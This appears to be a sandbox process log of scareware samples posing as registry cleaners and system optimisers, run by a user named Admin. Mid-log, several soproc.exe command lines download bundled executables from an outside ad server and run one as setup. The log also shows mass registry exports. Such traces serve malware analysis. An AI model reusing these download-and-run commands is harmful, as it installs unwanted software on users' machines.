"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5380 -prefMapHandle 5372 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3e14987-5542-4569-965a-3d3ca3298278} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 4 -isForBrowser -prefsHandle 5548 -prefMapHandle 5552 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d61802db-1661-4c5e-a010-ada9c89200c7} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5740 -childID 5 -isForBrowser -prefsHandle 5752 -prefMapHandle 5756 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed30a662-82b9-43bd-8cd4-bce958dfcb75} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7064 -childID 6 -isForBrowser -prefsHandle 6920 -prefMapHandle 6936 -prefsLen 33996 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6074eeeb-6084-463d-8410-36421699e55c} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5752 -childID 7 -isForBrowser -prefsHandle 6616 -prefMapHandle 6604 -prefsLen 31021 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35808e43-a6e6-4de2-9d3a-8470971cf285} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5416 -childID 8 -isForBrowser -prefsHandle 6092 -prefMapHandle 6080 -prefsLen 31021 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {070ebd82-bc8a-48c3-bf26-a7fbf1f613ad} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Users\Admin\Downloads\7z2407-x64.exe

"C:\Users\Admin\Downloads\7z2407-x64.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\AdvancedSystemOptimizer.7z"

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp

"C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp" /SL4 $C024C C:\Users\Admin\Desktop\[email protected] 9172173 50688

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\RegistryCleaner.7z"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5948 -childID 9 -isForBrowser -prefsHandle 4384 -prefMapHandle 5748 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81341aee-5c92-441a-915f-900107782e84} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3592 -childID 10 -isForBrowser -prefsHandle 4256 -prefMapHandle 6076 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2a6353d-03f5-42a3-913a-90a8926a844e} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6096 -childID 11 -isForBrowser -prefsHandle 7252 -prefMapHandle 7248 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82738c68-a38c-47e9-bff4-e47df3b66032} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp

C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp 4736 C:\Users\Admin\Desktop\ENDERM~3.EXE

C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp

"C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp" C:\Program Files (x86)\Registry Cleaner Trial\AffCreatorDLL.dll

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job regclean -action useraccept

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job soalert -action useraccept

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soalertdnld -proc sostreamer -pack SoRefRegSoAlertWxLiteNnAj -job soalert -url http://adserver.sharewareonline.com/bundle/soalert.exe -cmd {-setup} -longslowpace y

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job weatherbug -action userreject

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job newdotnet -action useraccept

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu sostreamer -proc sostreamer -pack SoRefRegSoAlertWxLiteNnAj -job newdotnet -url http://adserver.sharewareonline.com/bundle/nn.exe -target C:\Users\Admin\AppData\Local\Temp\NNCPUR638.exe

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job askjeeves -action useraccept

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu sostreamer -proc sostreamer -pack SoRefRegSoAlertWxLiteNnAj -job askjeeves -url http://adserver.sharewareonline.com/bundle/aj.exe -verif y

C:\PROGRA~2\REGIST~1\RegClean.exe

"C:\PROGRA~2\REGIST~1\RegClean.exe"

C:\Users\Admin\Desktop\Endermanch@RegistryCleaner_SOReferral.exe

"C:\Users\Admin\Desktop\Endermanch@RegistryCleaner_SOReferral.exe"

C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp

C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp 4736 C:\Users\Admin\Desktop\ENC9FB~1.EXE

C:\PROGRA~2\REGIST~1\RegClean.exe

"C:\PROGRA~2\REGIST~1\RegClean.exe"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\CPURocket.7z"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\CPURocket.7z"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x000000000000044C 0x00000000000004CC

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\Desktop\Endermanch@CPURocket_Adm.exe

"C:\Users\Admin\Desktop\Endermanch@CPURocket_Adm.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\SysWOW64\regedit.exe

/e "1.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "2.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "3.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "4.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "5.reg" "HKEY_CLASSES_ROOT\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "6.reg" "HKEY_CLASSES_ROOT\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "7.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "8.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EE-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "9.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EE-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "10.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EE-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "11.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EF-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "12.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "13.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EF-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "14.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EF-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "15.reg" "HKEY_CLASSES_ROOT\Interface\{A98639A1-CB0C-4A5C-A511-96547F752ACD}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "16.reg" "HKEY_CLASSES_ROOT\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "17.reg" "HKEY_CLASSES_ROOT\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "18.reg" "HKEY_CLASSES_ROOT\Interface\{ABFA087C-F703-4D53-946E-37FF82B2C994}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "19.reg" "HKEY_CLASSES_ROOT\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "20.reg" "HKEY_CLASSES_ROOT\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "21.reg" "HKEY_CLASSES_ROOT\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "22.reg" "HKEY_CLASSES_ROOT\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "23.reg" "HKEY_CLASSES_ROOT\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "24.reg" "HKEY_CLASSES_ROOT\Interface\{9E0BD17B-2D3C-4656-B94D-03084F3FD9D4}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "25.reg" "HKEY_CLASSES_ROOT\Interface\{A4C466B8-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "26.reg" "HKEY_CLASSES_ROOT\Interface\{A4C46780-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "27.reg" "HKEY_CLASSES_ROOT\Interface\{A4C46780-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "28.reg" "HKEY_CLASSES_ROOT\Interface\{A4C466B8-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "29.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3ED-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "30.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E7-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "31.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E7-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "32.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "33.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E7-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "34.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "35.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "36.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "37.reg" "HKEY_CLASSES_ROOT\Interface\{91C7765F-ED57-49AD-8B01-DC24816A5294}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "38.reg" "HKEY_CLASSES_ROOT\Interface\{919AA22C-B9AD-11D3-8D59-0050048384E3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "39.reg" "HKEY_CLASSES_ROOT\Interface\{8E8304B8-CBD1-44F8-B0E8-89C625B2002E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "40.reg" "HKEY_CLASSES_ROOT\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "41.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "42.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "43.reg" "HKEY_CLASSES_ROOT\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "44.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EC-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "45.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EB-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "46.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EB-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "47.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EC-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "48.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3ED-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "49.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3ED-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "50.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EC-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "51.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E9-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "52.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E9-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "53.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E9-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "54.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "55.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EB-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "56.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "57.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "58.reg" "HKEY_CLASSES_ROOT\Interface\{C5B6042B-FD21-404A-A0EF-E2FBB52B9080}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "59.reg" "HKEY_CLASSES_ROOT\Interface\{C52D32DD-F2B4-4052-8502-EC4305ECB71F}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "60.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F2-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "61.reg" "HKEY_CLASSES_ROOT\Interface\{C9590FA7-2132-47FB-9A78-AF0BF19AF4E6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "62.reg" "HKEY_CLASSES_ROOT\Interface\{CBB76011-C508-11D1-A3E3-00A0C90AEA82}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "63.reg" "HKEY_CLASSES_ROOT\Interface\{CBB76011-C508-11D1-A3E3-00A0C90AEA82}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "64.reg" "HKEY_CLASSES_ROOT\Interface\{C987A3FC-A6E7-4ED2-AED8-A08C3E1CC6DE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "65.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F0-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "66.reg" "HKEY_CLASSES_ROOT\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "67.reg" "HKEY_CLASSES_ROOT\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "68.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F0-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "69.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F2-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "70.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F1-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "71.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F1-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "72.reg" "HKEY_CLASSES_ROOT\Interface\{D7FA6F5E-9122-4900-8846-5AB0A5499D52}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "73.reg" "HKEY_CLASSES_ROOT\Interface\{D7FA6F5E-9122-4900-8846-5AB0A5499D52}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "74.reg" "HKEY_CLASSES_ROOT\Interface\{D4E0F020-720A-11CF-8136-00AA00C14959}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "75.reg" "HKEY_CLASSES_ROOT\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "76.reg" "HKEY_CLASSES_ROOT\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "77.reg" "HKEY_CLASSES_ROOT\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "78.reg" "HKEY_CLASSES_ROOT\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "79.reg" "HKEY_CLASSES_ROOT\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "80.reg" "HKEY_CLASSES_ROOT\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "81.reg" "HKEY_CLASSES_ROOT\Interface\{CDDE3804-2064-11CF-867F-00AA005FF34A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "82.reg" "HKEY_CLASSES_ROOT\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "83.reg" "HKEY_CLASSES_ROOT\Interface\{D4E0F020-720A-11CF-8136-00AA00C14959}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "84.reg" "HKEY_CLASSES_ROOT\Interface\{D3F22039-E3CF-4FC4-9A30-426A46056B8C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "85.reg" "HKEY_CLASSES_ROOT\Interface\{D3F22039-E3CF-4FC4-9A30-426A46056B8C}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "86.reg" "HKEY_CLASSES_ROOT\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "87.reg" "HKEY_CLASSES_ROOT\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "88.reg" "HKEY_CLASSES_ROOT\Interface\{B32C099E-C5D8-4E7C-9563-3D574C42C2FE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "89.reg" "HKEY_CLASSES_ROOT\Interface\{B32C099E-C5D8-4E7C-9563-3D574C42C2FE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "90.reg" "HKEY_CLASSES_ROOT\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "91.reg" "HKEY_CLASSES_ROOT\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "92.reg" "HKEY_CLASSES_ROOT\Interface\{B5ADE81E-0E61-4FE1-81C6-C333E4FFE0F1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "93.reg" "HKEY_CLASSES_ROOT\Interface\{B58845F4-9970-4D87-A636-169FB82ED642}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "94.reg" "HKEY_CLASSES_ROOT\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "95.reg" "HKEY_CLASSES_ROOT\Interface\{AF45AF49-D6AA-407D-BF87-3912236E9D94}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "96.reg" "HKEY_CLASSES_ROOT\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "97.reg" "HKEY_CLASSES_ROOT\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "98.reg" "HKEY_CLASSES_ROOT\Interface\{B28FA150-0FF0-11CF-A911-00AA0062BB4C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "99.reg" "HKEY_CLASSES_ROOT\Interface\{B28FA150-0FF0-11CF-A911-00AA0062BB4C}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "100.reg" "HKEY_CLASSES_ROOT\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "101.reg" "HKEY_CLASSES_ROOT\Interface\{C0324960-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "102.reg" "HKEY_CLASSES_ROOT\Interface\{BE8F9800-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "103.reg" "HKEY_CLASSES_ROOT\Interface\{BE8F9800-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "104.reg" "HKEY_CLASSES_ROOT\Interface\{C0324960-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "105.reg" "HKEY_CLASSES_ROOT\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "106.reg" "HKEY_CLASSES_ROOT\Interface\{C100BEBD-D33A-4a4b-BF23-BBEF4663D017}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "107.reg" "HKEY_CLASSES_ROOT\Interface\{C093CB63-5EF5-4585-AF8E-4D5637487B57}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "108.reg" "HKEY_CLASSES_ROOT\Interface\{BAECB0BD-A946-4771-BC30-E8B24F8D45C1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "109.reg" "HKEY_CLASSES_ROOT\Interface\{B5DEF5A1-FFB6-4E68-B3D8-A12AC60FDA54}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "110.reg" "HKEY_CLASSES_ROOT\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "111.reg" "HKEY_CLASSES_ROOT\Interface\{BB13B3C3-AF9B-43DB-9DF8-B2F65AA5E21B}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "112.reg" "HKEY_CLASSES_ROOT\Interface\{BE39F3D4-1B13-11D0-887F-00A0C90F2744}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "113.reg" "HKEY_CLASSES_ROOT\Interface\{BC97469F-CB11-4037-8DCE-5FC9F5F85307}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

